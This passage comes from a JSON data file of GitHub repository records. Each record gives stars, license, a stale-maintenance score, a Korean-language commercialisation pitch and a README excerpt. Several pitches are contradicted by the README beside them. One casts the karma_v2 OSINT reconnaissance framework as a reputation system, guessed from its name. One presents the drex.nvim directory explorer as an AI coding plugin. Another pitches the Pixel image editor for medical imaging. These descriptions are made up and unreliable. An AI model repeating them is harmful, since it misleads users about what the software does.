Tool](#build-your-own-command-line-tool)\n* [Database](#build-your-own-database)\n* [Docker](#build-your-own-docker)\n* [Emulator / Virtual Machine](#build-your-own-emulator--virtual-machine)\n* [Front-end Framework / Library](#build-your-own-front-end-framework--library)\n* [Game](#build-your-own-game)\n* [Git](#build-y","composite_score":0.2576,"license_safety_tag":"unknown"},{"name":"PierreRochard/node-launcher","github_url":"https://github.com/PierreRochard/node-launcher","stars":5,"language":"Python","license":"MIT","abandonment_months":5,"description":"# node-launcher 사업성 분석\n\n## 왜 보물인가\n일반인도 복잡한 기술 설정 없이 쉽게 노드를 실행할 수 있도록 돕는 도구로, 블록체인이나 분산 네트워크 참여의 진입장벽을 크게 낮춥니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 비개발자용 노드 관리 클라우드 플랫폼 (월 구독료로 자동 운영)\n- **내부 업무 도구**: 암호화폐 거","readme_excerpt":"# User Guides\n\n1. [Please start here!](https://medium.com/@pierre_rochard/windows-macos-lightning-network-284bd5034340)\n2. [Send a payment with the Joule Chrome extension](https://medium.com/@pierre_rochard/bitcoin-lightning-joule-chrome-extension-ac149bb05cb9)\n\n# Requirements\n1. ~300 GB of download bandwidth\n2. ~10 GB of disk space (~300 GB if you want the Bitcoin transaction index, makes for a faster LND)\n3. Windows 7+ or macOS > 10.14.6 (Mojave, released in 2018)\n\nLinux works but it is not packaged, follow the developer steps below to run it from the Linux command line. \n\nPlease submit a pull request if you want to add Linux packaging! A .deb and .rpm would help grow the Lightning network...\n\n\n# Install \n\nDownload and open the latest release for your operating system: \nhttps://github.com/PierreRochard/node-launcher/releases\n\n# Node Launcher\n\n1. Creates a node launcher data directory \n    * macOS: `~/Library/Application Support/Node Launcher/`\n    * Windows: `%localappdata%/Node\\ Lau","composite_score":0.2576,"license_safety_tag":"safe"},{"name":"mr-mig/every-programmer-should-know","github_url":"https://github.com/mr-mig/every-programmer-should-know","stars":32,"language":"","license":"CC-BY-4.0","abandonment_months":5,"description":"# every-programmer-should-know 분석\n\n## 왜 보물인가\n프로그래머가 꼭 알아야 할 핵심 개념들을 한곳에 모아 정리한 교육 자료로, 코딩 입문자부터 경력자까지 학습하고 참고할 수 있는 가치 있는 지식 저장소입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼(SaaS)**: 초보 개발자 대상 월 구독형 강의 사이트에 이 자","readme_excerpt":"<div align=\"center\" markdown=\"1\">\n   <a href=\"https://mylevel.dev?utm_source=github&utm_medium=gh_banner&utm_campaign=gh_sponsorship\">\n    <img width=\"400\" alt=\"FTSE sponsorship card\" src=\"https://github.com/user-attachments/assets/32ad7485-feec-4f87-b213-7c4ecfbe7fea\" />\n\n\n   </a>\n\n### [Measure your Software Developer level against a cross-industry benchmark in 10 minutes!](https://mylevel.dev?utm_source=github&utm_medium=gh_link&utm_campaign=gh_sponsorship)\n\n[Take a FREE quiz and get instant results - no email submission required](https://mylevel.dev?utm_source=github&utm_medium=gh_sublink&utm_campaign=gh_sponsorship)<br>\n*<sub>Created by this repo author</sub>*\n\n</div>\n\n# Every Programmer Should Know :thinking:\nA collection of (mostly) technical things every software developer should know.\n\n*These are resources I can recommend to every programmer regardless of their skill level or tech stack*\n\nHighly opinionated :bomb:. Not backed by science.\nComes in no particular order :recycle:\n\n","composite_score":0.2575,"license_safety_tag":"unknown"},{"name":"cacheflowe/creative-coding-notes","github_url":"https://github.com/cacheflowe/creative-coding-notes","stars":13,"language":"","license":"unknown","abandonment_months":13,"description":"# Creative Coding Notes 상품화 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 개념을 초보자도 이해할 수 있게 정리한 학습 자료로, 창의적인 코딩 교육 시장에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 학원 SaaS**: 구독 기반 강의 플랫폼으로 초보자 대상 교육 콘텐츠 제공\n2. **기업 신입사원 교육 도구**: ","readme_excerpt":"<!--\ntitle: Creative Coding Notes\ndescription: A collection of creative coding links.\n-->\n# Creative Coding Notes\n\n## Table of Contents\n\n- [Creative Coding History](#creative-coding-history)\n- [Modern Creative Coding Uses](#modern-creative-coding-uses)\n- [Graphics Concepts](#graphics-concepts)\n- [Creative Coding Environments and Libraries](#creative-coding-environments-and-libraries)\n- [Communication Protocols](#communication-protocols)\n- [Multimedia Tools](#multimedia-tools)\n- [Unique Displays and Touchscreens](#unique-displays-and-touchscreens)\n- [Hardware](#hardware)\n- [Other output options](#other-output-options)\n- [More resources](#more-resources)\n  - [Websites](#websites)\n  - [Books](#books)\n  - [Conferences](#conferences)\n  - [Videos](#videos)\n  - [Podcasts](#podcasts)\n  - [People](#people)\n\nIn addition to this list, check out these awesome lists:\n\n- [https://github.com/terkelg/awesome-creative-coding](https://github.com/terkelg/awesome-creative-coding)\n- [https://github.com/kos","composite_score":0.2574,"license_safety_tag":"unknown"},{"name":"zeit/swr","github_url":"https://github.com/zeit/swr","stars":38,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"","readme_excerpt":"[![SWR](https://assets.vercel.com/image/upload/v1572289618/swr/banner.png)](https://swr.vercel.app)\n\n<p align=\"center\">\n  <a aria-label=\"Vercel logo\" href=\"https://vercel.com\">\n    <img src=\"https://badgen.net/badge/icon/Made%20by%20Vercel?icon=zeit&label&color=black&labelColor=black\">\n  </a>\n  <br/>\n  <a aria-label=\"NPM version\" href=\"https://www.npmjs.com/package/swr\">\n    <img alt=\"\" src=\"https://badgen.net/npm/v/swr\">\n  </a>\n  <a aria-label=\"Package size\" href=\"https://bundlephobia.com/result?p=swr\">\n    <img alt=\"\" src=\"https://badgen.net/bundlephobia/minzip/swr\">\n  </a>\n  <a aria-label=\"License\" href=\"https://github.com/vercel/swr/blob/main/LICENSE\">\n    <img alt=\"\" src=\"https://badgen.net/npm/license/swr\">\n  </a>\n</p>\n\n## Introduction\n\nSWR is a React Hooks library for data fetching.\n\nThe name “**SWR**” is derived from `stale-while-revalidate`, a cache invalidation strategy popularized by [HTTP RFC 5861](https://tools.ietf.org/html/rfc5861).\n**SWR** first returns the data from ca","composite_score":0.2571,"license_safety_tag":"safe"},{"name":"google/ts-style","github_url":"https://github.com/google/ts-style","stars":21,"language":"TypeScript","license":"Apache-2.0","abandonment_months":4,"description":"# google/ts-style 분석 보고서\n\n## 왜 보물인가\n구글이 만든 타입스크립트 코드 작성 규칙 모음으로, 큰 프로젝트에서 팀원들이 같은 방식으로 코드를 작성하도록 돕는 표준화 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발팀이 많은 소프트웨어 회사가 이 규칙을 적용하여 코드 품질 관리 자동화 서비스로 제공\n2. **내","readme_excerpt":"# gts\n\n> Google TypeScript Style\n\n[![NPM Version][npm-image]][npm-url]\n[![GitHub Actions][github-image]][github-url]\n[![Known Vulnerabilities][snyk-image]][snyk-url]\n[![codecov][codecov-image]][codecov-url]\n[![TypeScript Style Guide][gts-image]][gts-url]\n\n[gts][npm-url] is Google's TypeScript style guide, and the configuration for our formatter, linter, and automatic code fixer. No lint rules to edit, no configuration to update, no more bike shedding over syntax.\n\nTo borrow from [standardjs][standardjs-url]:\n\n- **No configuration**. The easiest way to enforce consistent style in your project. Just drop it in.\n- **Automatically format code**. Just run `gts fix` and say goodbye to messy or inconsistent code.\n- **Catch style issues & programmer errors early**. Save precious code review time by eliminating back-and-forth between reviewer & contributor.\n- **Opinionated, but not to a fault**. We recommend you use the default configuration, but if you _need_ to customize compiler or linter co","composite_score":0.257,"license_safety_tag":"safe"},{"name":"testing-library/dom-testing-library","github_url":"https://github.com/testing-library/dom-testing-library","stars":6,"language":"JavaScript","license":"mit","abandonment_months":6,"description":"# testing-library/dom-testing-library 분석\n\n## 왜 보물인가\n웹사이트가 제대로 작동하는지 자동으로 검증해주는 도구로, 사용자 입장에서 실제 문제를 감지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 품질 관리 서비스**: 소프트웨어 회사들이 자신의 제품을 출시 전에 버그를 찾아내는 자동 검사 도구로 판매\n2.","readme_excerpt":"<div align=\"center\">\n<h1>DOM Testing Library</h1>\n\n<a href=\"https://www.emojione.com/emoji/1f419\">\n  <img\n    height=\"80\"\n    width=\"80\"\n    alt=\"octopus\"\n    src=\"https://raw.githubusercontent.com/testing-library/dom-testing-library/main/other/octopus.png\"\n  />\n</a>\n\n<p>Simple and complete DOM testing utilities that encourage good testing\npractices.</p>\n\n[**Read the docs**](https://testing-library.com/dom) |\n[Edit the docs](https://github.com/testing-library/testing-library-docs)\n\n</div>\n\n<hr />\n\n<!-- prettier-ignore-start -->\n[![Build Status][build-badge]][build]\n[![Code Coverage][coverage-badge]][coverage]\n[![version][version-badge]][package]\n[![downloads][downloads-badge]][npmtrends]\n[![MIT License][license-badge]][license]\n[![All Contributors][all-contributors-badge]](#contributors)\n[![PRs Welcome][prs-badge]][prs]\n[![Code of Conduct][coc-badge]][coc]\n[![Discord][discord-badge]][discord]\n\n[![Watch on GitHub][github-watch-badge]][github-watch]\n[![Star on GitHub][github-star-badge]]","composite_score":0.257,"license_safety_tag":"safe"},{"name":"muukii/Pixel","github_url":"https://github.com/muukii/Pixel","stars":6,"language":"Swift","license":"MIT","abandonment_months":4,"description":"# Pixel 저장소 분석\n\n## 왜 보물인가\n디지털 이미지를 작은 단위로 나누어 처리하는 핵심 기술로, 사진 편집부터 의료 영상 분석까지 광범위하게 활용될 수 있는 기반 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 사진 필터 및 보정 앱 (인스타그램 같은 이미지 편집 플랫폼)\n- **내부 업무 도구**: 의료 병원의 ","readme_excerpt":"<h1 align=center>Brightroom</h1>\n<p align=center><i>A full-featured composable image editor with a customizable UI -- all backed by the power of Metal.</i></p>\n<br/>\n\n| Image Editor | PhotosCropRotating | Face Detection | Masking |\n| --- | --- | --- | --- |\n| <img width=200px src=\"https://user-images.githubusercontent.com/1888355/112865486-c9154880-90f3-11eb-89eb-bc55f924f517.gif\" /> | <img width=200px src=https://github.com/FluidGroup/Brightroom/assets/1888355/df14adc2-97fc-465b-8919-7727c9bae8bd /> | <img width=200px src=https://user-images.githubusercontent.com/1888355/112720303-cde5cb00-8f40-11eb-941f-c134368b87c5.gif /> | <img width=200px src=https://user-images.githubusercontent.com/1888355/112927084-6487d700-914f-11eb-86a5-28f9373285e6.gif /> |\n\n## Features\n\n- **Create your own image editor UI** by composing components.\n  - Components are built separately and run standalone using an `EditingStack`.\n  - `EditingStacks` **manage editing history** and render images. *It's like a he","composite_score":0.2569,"license_safety_tag":"safe"},{"name":"sherminvo/TokenEconomyBook","github_url":"https://github.com/sherminvo/TokenEconomyBook","stars":5,"language":"","license":"NOASSERTION","abandonment_months":12,"description":"# TokenEconomyBook 평가 분석\n\n## 왜 보물인가\n토큰 경제 설계의 원리를 체계적으로 배울 수 있는 실용적 가이드로, 암호화폐·게임·플랫폼 기업들이 겪는 경제 시스템 설계 문제를 풀 수 있게 해준다.\n\n## 어디에 쓸 수 있나\n1. **게임사 온보딩 교육 SaaS**: 신작 게임의 토큰·재화 밸런싱 설계 가이드를 제공하는 컨설팅 플랫폼\n2. ","readme_excerpt":"\n⚠️ **Outdated — This is the 2nd Edition of Token Economy (2020).**\n\n👉 **Current 3rd Edition (2025):**  \n• GitHub landing repo → <https://github.com/Token-Economy-Book/3rdEdition-English>  \n• Open-access web version → <https://token.kitchen/token-economy/third-edition>\n\n----\n\n# Token Economy: How the Web3 reinvents the Internet\nSecond edition, first amended printing, Nov 2020.<br>\nThe first edition was published by BlockchainHub Berlin https://blockchainhub.net in June 2019 under the title “Token Economy: How Blockchain & Smart contracts revolutionize the Economy” and had two amended editions.\n\n* Read for free on Github: https://github.com/sherminvo/TokenEconomyBook/wiki<br>\n* Print book (paperback & hardcopy) and eBook editions are also available on Amazon (https://amzn.to/2W7lQ8h) & other online bookstores.\n* Other languages: https://github.com/Token-Economy-Book/\n\n# Imprint\nAuthor: Shermin Voshmgir <br>\nPublisher: Token Kitchen, 10119 Berlin <br>\nhttp://token.kitchen<br>\nDesign: Jus","composite_score":0.2567,"license_safety_tag":"unknown"},{"name":"gdi2290/awesome-angular","github_url":"https://github.com/gdi2290/awesome-angular","stars":6,"language":"HTML","license":"CC0-1.0","abandonment_months":0,"description":"# awesome-angular 분석 보고서\n\n## 왜 보물인가\nAngular 웹 개발에 필요한 모든 도구와 자료를 한곳에 모아놓은 가이드북으로, 개발자들의 학습 시간과 검색 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Angular 개발자 커뮤니티를 위한 유료 구독 플랫폼으로, 최신 도구 추천과 베스트 프랙티","readme_excerpt":"# Awesome Angular [![Awesome](https://awesome.re/badge.svg)](https://github.com/sindresorhus/awesome)\n\n<p align=\"center\">\n  <a href=\"https://patrickjs.com\" target=\"_blank\">\n    <img src=\"/media/new/awesome-angular.png\" alt=\"Awesome Angular\" />\n  </a>\n</p>\n\n> logo designed by [SAWARATSUKI](https://github.com/SAWARATSUKI/KawaiiLogos)\n\nThis is the Awesome list of the Angular framework, and it contains intriguing libraries in the Angular ecosystem for all developers. Something missing? [PRs welcomed!](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)\n\n> Repo maintained by [@jdegand](https://github.com/jdegand) and [@patrickjs](https://github.com/patrickjs)\n\nCurrent Angular version: [![npm version](https://badge.fury.io/js/%40angular%2Fcore.svg)](https://www.npmjs.com/~angular)  \n\n## Contents\n\n* [Angular](#angular)\n  * [Official Resources](#official-resources)\n  * [Builders](#builders)\n  * [CLI Tools](#cli-tools)\n  * [Deployment](#deployment)\n  * [Desktop Applications](#","composite_score":0.2562,"license_safety_tag":"unknown"},{"name":"susiai/susi_devsite","github_url":"https://github.com/susiai/susi_devsite","stars":11,"language":"Python","license":"LGPL-3.0","abandonment_months":13,"description":"# Susi DevSite 상용화 분석\n\n## 왜 보물인가\nSUSI라는 AI 어시스턴트의 개발 사이트로, 커스터마이징 가능한 AI 챗봇 플랫폼을 기반으로 다양한 산업에 맞춤형 솔루션을 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **고객 지원 자동화 SaaS**: 전자상거래, 금융, 통신사 등이 자사 웹사이트에 붙일 수 있는 AI 챗봇 서비스로 제","readme_excerpt":"# AI Command Line Tools\n\nWelcome to the `susi_shell` repository, which is part of the susi_api project aimed at providing AI capabilities in a command-line based environment. This suite of tools enables users to interact with AI services directly from their terminal.\n\nSome of these tools currently require a working connection to the OpenAI API.\nFuture versions of this command line tool collection should use local self-hosted services.\nWe implement those function in the susi_api project.\n\n## Available Commands (all to be implemented)\n\n- `run <model-name>` - Run a model with the given name and chat.\n- `ask <model-name>` - Provides an answer to a submitted question.\n- `context` - Select, view or create a context for the ask command.\n- `complete` - Takes a piece of text and uses AI to generate a contextually relevant completion.\n- `listen` - record audio and optionally pass it to the transscript command\n- `transscript` - Listens to audio input and transcribes it into text.\n- `translate` - ","composite_score":0.2561,"license_safety_tag":"restricted"},{"name":"Kholid060/automa","github_url":"https://github.com/Kholid060/automa","stars":37,"language":"Vue","license":"NOASSERTION","abandonment_months":3,"description":"# Automa 저장소 분석\n\n## 왜 보물인가\n반복되는 온라인 작업(웹사이트 자동 접속, 데이터 수집, 양식 작성 등)을 사람 대신 자동으로 처리해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업들이 구독료를 내고 반복 업무 자동화 기능을 사용하는 웹 플랫폼\n2. **내부 업무 도구**: 대기업의 HR팀이 채용공고 모니터링","readme_excerpt":"<img src=\"src/assets/images/icon-128.png\" width=\"64\"/>\n\n# Automa\n<p>\n  <img alt=\"Automa latest version\" src=\"https://img.shields.io/github/package-json/v/AutomaApp/automa\" />\n  <a href=\"https://twitter.com/AutomaApp\">\n    <img alt=\"Follow Us on Twitter\" src=\"https://img.shields.io/twitter/follow/AutomaApp?style=social\" />\n  </a>\n  <a href=\"https://discord.gg/C6khwwTE84\">\n    <img alt=\"Chat with us on Discord\" src=\"https://img.shields.io/discord/942211415517835354?label=join%20discord&logo=Discord&logoColor=white\" />\n  </a>\n</p>\n\nAn extension for automating your browser by connecting blocks. <br />\nAuto-fill forms, do a repetitive task, take a screenshot, or scrape website data — the choice is yours. You can even schedule when the automation will execute!\n\n## Downloads\n<table cellspacing=\"0\" cellpadding=\"0\">\n  <tr>\n    <td valign=\"center\">\n      <a align=\"center\" href=\"https://chrome.google.com/webstore/detail/automa/infppggnoaenmfagbfknfkancpbljcca\">\n        <img src=\"https://user-imag","composite_score":0.2561,"license_safety_tag":"unknown"},{"name":"graninas/The-Voids-Of-Haskell","github_url":"https://github.com/graninas/The-Voids-Of-Haskell","stars":6,"language":"","license":"unknown","abandonment_months":13,"description":"# The Voids Of Haskell 분석\n\n## 왜 보물인가\n프로그래밍 언어의 까다로운 부분을 쉽게 배울 수 있도록 정리한 학습 자료로, 개발자 교육 시장에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 온라인 코딩 강좌 사이트에서 유료 학습 교재로 판매\n2. **기업 내부 교육**: 신입 개발자 온보딩 프로그램을 위","readme_excerpt":"# The Voids Of Haskell\n\nI often hear how happy Haskellers are because they have such a great and unique language. They must be proud of how the outside world respects this Haskell technical superiority and how the language influences all the other languages. This is definitely deserved, and it’s definitely a reason for pride.\n\nBut when it comes to a closer comparison with any other mainstream language, we see that not everything in the Haskell ecosystem is good enough. The skies are getting dark, revealing some problems, some imperfections of the bright picture we’re trying to present to the outer world. It’s not a total eclipse; the community has made a great effort to improve the ecosystem: theoretical foundations of the language, the GHC compiler, packaging/building tools (stack & cabal), IDEs (HLS), libraries, the Haskell process itself (Haskell Foundation), - all these things are reasonably good and getting better.\n\nHowever, there is a sunspot, a definite flaw in the ecosystem tha","composite_score":0.2559,"license_safety_tag":"unknown"},{"name":"GeekyAnts/vue-native-core","github_url":"https://github.com/GeekyAnts/vue-native-core","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":4,"description":"# Vue Native Core 분석 보고서\n\n## 왜 보물인가\n모바일 앱 개발을 웹 개발처럼 쉽게 만들어주는 기술로, 개발자들이 한 번의 작업으로 iPhone과 Android 앱을 동시에 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 스타트업이 웹과 모바일 앱을 저렴하게 동시 출시하는 멀티플랫폼 앱 빌더 서비스\n2. ","readme_excerpt":"## ⚠️ This project has been deprecated and is no longer maintained ⚠️\n\n# Vue Native\n\n[![No Maintenance Intended](https://unmaintained.tech/badge.svg)](http://unmaintained.tech/)\n\nVisit our website at [vue-native.io](https://vue-native.io) or read the official documentation [here](https://vue-native.io/docs/installation.html).\n\n## Build native mobile apps using Vue\n\nVue Native is a framework to build cross platform native mobile apps using JavaScript. It is a wrapper around the APIs of React Native. So, with Vue Native, you can do everything that you can do with React Native. With Vue Native, you get\n\n- **The simplicity of Vue.js.** Incrementally build user interfaces with the familiar syntax of HTML and CSS in single file components.\n- **Seamless interop with React Native.** Use core React Native components with Vue.js syntax out of the box to develop mobile apps on both iOS and Android.\n\n## Contents\n- [Documentation](#documentation)\n- [Installation](#installation)\n- [Project setup wit","composite_score":0.2557,"license_safety_tag":"safe"},{"name":"TheBlob42/drex.nvim","github_url":"https://github.com/TheBlob42/drex.nvim","stars":7,"language":"Lua","license":"GPL-3.0","abandonment_months":13,"description":"# drex.nvim 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 매일 사용하는 텍스트 편집기에 AI 기능을 추가하는 작은 플러그인으로, 코딩 작업을 더 빠르고 쉽게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자용 SaaS 구독 서비스**: 월 구독료를 받고 클라우드 기반 AI 코딩 어시스턴트로 제공\n2. **기업 소프트웨어 개발팀 내부 도구","readme_excerpt":"# DREX\n\nAnother **D**i**R**ectory **EX**plorer for Neovim\n\n![drex](./assets/drex.png)\nFor showcase GIFs see [here](https://github.com/TheBlob42/drex.nvim/wiki/Showcase)\n\n- easily navigate through your file system\n- split window and project drawer support\n- add, copy, move, rename and delete elements\n- mark and operate on multiple elements\n- automatic file system synchronization\n- powered by [libuv](https://github.com/luvit/luv/blob/master/docs.md)\n\n## Installation\n\n> DREX requires Neovim version ≥ 0.7\n\nInstall DREX with your favorite plugin manager\n\n[packer](https://github.com/wbthomason/packer.nvim)\n\n```lua\nuse {\n  'theblob42/drex.nvim',\n  requires = 'kyazdani42/nvim-web-devicons', -- optional\n}\n```\n\n[vim-plug](https://github.com/junegunn/vim-plug)\n\n```vim\nPlug 'theblob42/drex.nvim'\nPlug 'kyazdani42/nvim-web-devicons' \" optional\n```\n\nYou only need to install [nvim-web-devicons](https://github.com/kyazdani42/nvim-web-devicons) if you like to have nice file type icons. The plugin works ","composite_score":0.2553,"license_safety_tag":"restricted"},{"name":"antvis/G2Plot","github_url":"https://github.com/antvis/G2Plot","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"<img src=\"https://gw.alipayobjects.com/zos/antfincdn/R8sN%24GNdh6/language.svg\" width=\"18\"> [English](./README.en-US.md) | 简体中文\n\n<h1 align=\"center\">G2Plot</h1>\n\n<div align=\"center\">\n\n基于 [G2 4.x](https://github.com/antvis/G2) 版本二次封装的图表库。\n\n[![Version](https://badgen.net/npm/v/@antv/g2plot)](https://npmjs.com/@antv/g2plot)\n[![NPM downloads](https://img.shields.io/npm/dm/@antv/g2plot.svg)](https://npmjs.com/@antv/g2plot)\n![Latest commit](https://badgen.net/github/last-commit/antvis/G2Plot)\n[![build Status](https://github.com/antvis/G2Plot/workflows/build/badge.svg?branch=master)](https://github.com/antvis/G2Plot/actions?query=workflow%3Abuild)\n[![coverage](https://img.shields.io/coveralls/antvis/G2Plot/master.svg)](https://coveralls.io/github/antvis/G2Plot)\n[![Percentage of issues still open](http://isitmaintained.com/badge/open/antvis/g2plot.svg)](http://isitmaintained.com/project/antvis/g2plot \"Percentage of issues still open\")\n[![Average time to resolve an issue](http://isitmaintained.c","composite_score":0.2552,"license_safety_tag":"safe"},{"name":"xujiajun/nutsdb","github_url":"https://github.com/xujiajun/nutsdb","stars":7,"language":"Go","license":"Apache-2.0","abandonment_months":4,"description":"# NutsDB 상용화 분석\n\n## 왜 보물인가\n빠르고 가벼운 데이터 저장소로, 앱이나 웹서비스에서 정보를 빠르게 저장하고 찾아야 할 때 사용할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 분석 SaaS**: 고객 행동 데이터를 빠르게 저장하고 즉시 분석해 결과를 대시보드로 제공하는 서비스\n2. **캐시 관리 API**: 웹사이트 속도를","readme_excerpt":"<p align=\"center\">\n    <img src=\"https://user-images.githubusercontent.com/6065007/141310364-62d7eebb-2cbb-4949-80ed-5cd20f705405.png\">\n</p>\n\n<div class=\"column\" align=\"middle\">\n  <a href=\"https://godoc.org/github.com/nutsdb/nutsdb\"><img src=\"https://godoc.org/github.com/nutsdb/nutsdb?status.svg\" /></a>\n  <a href=\"https://goreportcard.com/report/github.com/nutsdb/nutsdb\"><img src=\"https://goreportcard.com/badge/github.com/nutsdb/nutsdb\" /></a>\n  <a href=\"https://github.com/nutsdb/nutsdb/actions/workflows/go.yml\"><img src=\"https://github.com/nutsdb/nutsdb/actions/workflows/go.yml/badge.svg\"/></a>\n  <a href=\"https://codecov.io/gh/nutsdb/nutsdb\"><img src=\"https://codecov.io/gh/nutsdb/nutsdb/branch/master/graph/badge.svg?token=CupujOXpbe\"/></a>\n  <a href=\"https://raw.githubusercontent.com/nutsdb/nutsdb/master/LICENSE\"><img src=\"http://img.shields.io/badge/license-Apache_2-blue.svg?style=flat-square\"/></a>\n  <a href=\"https://github.com/avelino/awesome-go#database\"><img src=\"https://awesome.","composite_score":0.2545,"license_safety_tag":"safe"},{"name":"UrloMythus/MammaMia","github_url":"https://github.com/UrloMythus/MammaMia","stars":153,"language":"Python","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2545,"license_safety_tag":"safe"},{"name":"Dheerajmadhukar/karma_v2","github_url":"https://github.com/Dheerajmadhukar/karma_v2","stars":6,"language":"Shell","license":"unknown","abandonment_months":12,"description":"# Karma V2 상용화 분석\n\n## 왜 보물인가\n프로젝트 이름이 \"karma\"인 것으로 보아 사용자 행동이나 평판 시스템을 자동으로 관리하는 도구로 추정되며, 이는 커뮤니티나 팀 협업 플랫폼에서 매우 수요 높은 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 커뮤니티 플랫폼**: 사용자의 기여도와 신뢰도를 자동 계산해 순위 표시 시스템 제공\n2.","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"img/karma_v2_logo.png\" alt=\"karma_v2\" width=\"530px\"></a>\n  <br>\n\n⡷⠂𝚔𝚊𝚛𝚖𝚊 𝚟𝟸⠐⢾\n</h1>\n\n<h2 align=\"center\">\n  𝚔𝚊𝚛𝚖𝚊 𝚟𝟸 is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework)\n  \n![Follow on Twitter](https://img.shields.io/twitter/follow/Dheerajmadhukar?style=social)  [![Version](https://img.shields.io/badge/Release-%E2%A1%B7%E2%A0%82%F0%9D%9A%94%F0%9D%9A%8A%F0%9D%9A%9B%F0%9D%9A%96%F0%9D%9A%8A%20%F0%9D%9A%9F%F0%9D%9F%B8%E2%A0%90%E2%A2%BE-white.svg)]()  [![Build](https://img.shields.io/badge/Supported_OS-Linux-white.svg)]() [![Build](https://img.shields.io/badge/Supported_WSL-Windows-white.svg)]()   [![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.me/dheerajkmadhukar)\n</h2>\n𝚔𝚊𝚛𝚖𝚊 𝚟𝟸 can be used by Infosec Researchers, Penetration Testers, Bug Hunters to find deep information, more assets, WAF/CDN bypassed IPs, Internal/External Infra, Publicly exposed leaks and many more about their target. Shodan","composite_score":0.2545,"license_safety_tag":"unknown"},{"name":"0gfoundation/0g-storage-node","github_url":"https://github.com/0gfoundation/0g-storage-node","stars":178,"language":"Rust","license":"Apache-2.0","abandonment_months":4,"description":"","readme_excerpt":"","composite_score":0.2544,"license_safety_tag":"safe"},{"name":"open-amdocs/webrix","github_url":"https://github.com/open-amdocs/webrix","stars":6,"language":"JavaScript","license":"Apache-2.0","abandonment_months":13,"description":"# Webrix 저장소 분석 보고서\n\n## 왜 보물인가\n웹 애플리케이션을 빠르게 만들 수 있는 재사용 가능한 기초 도구 모음으로, 반복적인 개발 작업을 줄여 시간과 비용을 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 SaaS 서비스**: 회사의 고객 관리, 매출 추적 등 업무용 웹 애플리케이션을 빠르게 구축\n2. **내부 업무 도구**:","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://github.com/open-amdocs/webrix-docs/raw/master/src/resources/images/og-image.png\" height=\"300\"/>\n</p>\n<p align=\"center\">\n  Powerful building blocks for React-based web applications.<br/>\n  For documentation, API overview and live examples, visit <a href=\"https://webrix.amdocs.com\">webrix.amdocs.com</a>.\n</p>\n\n---\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/webrix\">\n    <img src=\"https://img.shields.io/npm/dt/webrix.svg\" />\n  </a>\n  <a href=\"https://www.npmjs.com/package/webrix\">\n    <img src=\"https://badge.fury.io/js/webrix.svg\" />\n  </a>\n  <a href=\"https://circleci.com/gh/open-amdocs/webrix\">\n    <img src=\"https://circleci.com/gh/open-amdocs/webrix.svg?style=shield&circle-token=:circle-token\" />\n  </a>\n  <a href=\"https://codecov.io/gh/open-amdocs/webrix\">\n    <img src=\"https://codecov.io/gh/open-amdocs/webrix/branch/master/graph/badge.svg\" />\n  </a>\n  <a href=\"https://github.com/open-amdocs/webrix/blob/master/CONTRIBUTING.md\">\n   ","composite_score":0.2543,"license_safety_tag":"safe"},{"name":"HXSecurity/DongTai","github_url":"https://github.com/HXSecurity/DongTai","stars":55,"language":"Python","license":"Apache-2.0","abandonment_months":12,"description":"# DongTai 저장소 분석 보고서\n\n## 왜 보물인가\n웹사이트와 애플리케이션의 보안 취약점을 자동으로 찾아주는 도구로, 해킹으로부터 기업 데이터를 지키는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 보안 검사 플랫폼으로 월 구독 서비스 제공 (기업들이 주기적으로 시스템 점검)\n2. **내부 업무 도구**: 소프트웨어","readme_excerpt":"# DongTai\n\n[![django-project](https://img.shields.io/badge/django%20versions-3.2.15-blue)](https://www.djangoproject.com/)\n[![license Apache-2.0](https://img.shields.io/github/license/HXSecurity/DongTai-agent-java)](https://github.com/HXSecurity/DongTai-agent-java/blob/main/LICENSE)\n[![GitHub release](https://img.shields.io/github/v/release/HXSecurity/DongTai?label=DongTai)](https://github.com/HXSecurity/DongTai/releases)\n\n[![GitHub release](https://img.shields.io/github/v/release/HXSecurity/Dongtai-webapi?label=Dongtai-webapi)](https://github.com/HXSecurity/DongTai-webapi/releases)\n[![GitHub release](https://img.shields.io/github/v/release/HXSecurity/Dongtai-openapi?label=Dongtai-openapi)](https://github.com/HXSecurity/DongTai-openapi/releases)\n[![GitHub release](https://img.shields.io/github/v/release/HXSecurity/Dongtai-engine?label=Dongtai-engine)](https://github.com/HXSecurity/DongTai-engine/releases)\n[![GitHub release](https://img.shields.io/github/v/release/HXSecurity/Dongtai-web","composite_score":0.2539,"license_safety_tag":"safe"},{"name":"0xnr/awesome-bigdata","github_url":"https://github.com/0xnr/awesome-bigdata","stars":5,"language":"","license":"MIT","abandonment_months":4,"description":"# awesome-bigdata 저장소 분석\n\n## 왜 